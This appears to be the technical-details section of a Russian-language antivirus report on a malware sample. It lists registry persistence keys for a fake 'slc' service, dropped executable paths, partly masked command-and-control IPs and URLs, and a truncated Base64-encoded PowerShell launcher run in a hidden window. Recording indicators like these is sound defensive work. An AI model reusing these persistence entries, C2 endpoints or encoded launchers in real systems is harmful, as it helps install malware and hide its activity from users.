Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\slc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\slc] 'ImagePath' = '"%WINDIR%\SysWOW64\d3dramp\slc.exe"'
- 'slc' "%WINDIR%\SysWOW64\d3dramp\slc.exe"
- 'slc' %WINDIR%\SysWOW64\d3dramp\slc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHUAcQB3ADEANgAzAD0AKAAnAE0AJwArACcANAA5AHgAYQAnACsAJwAwAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQARQBOAHYAOgBUAEUATQBQAFwATwBGAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\je42ibif.exe
- %WINDIR%\syswow64\d3dramp\slc.exe
- %TEMP%\office2019\je42ibif.exe в %WINDIR%\syswow64\d3dramp\slc.exe
- '65.#6.62.20':80
- '20#.#26.6.222':8080
- http://www.os####obouliz.com/wp-admin/m1J/
- http://20#.##6.6.222:8080/Qic2wPGnwKr/JwJC8ZTW9bJ/KabfNJ/pUFtWnN6Aa1czoH2D/ via 20#.#26.6.222
- DNS ASK os####obouliz.com
- '%TEMP%\office2019\je42ibif.exe'
- '%WINDIR%\syswow64\d3dramp\slc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHUAcQB3ADEANgAzAD0AKAAnAE0AJwArACcANAA5AHgAYQAnACsAJwAwAG8AJwApADsAJgAoACcAbgBlAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQARQBOAHYAOgBUAEUATQBQAFwATwBGAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)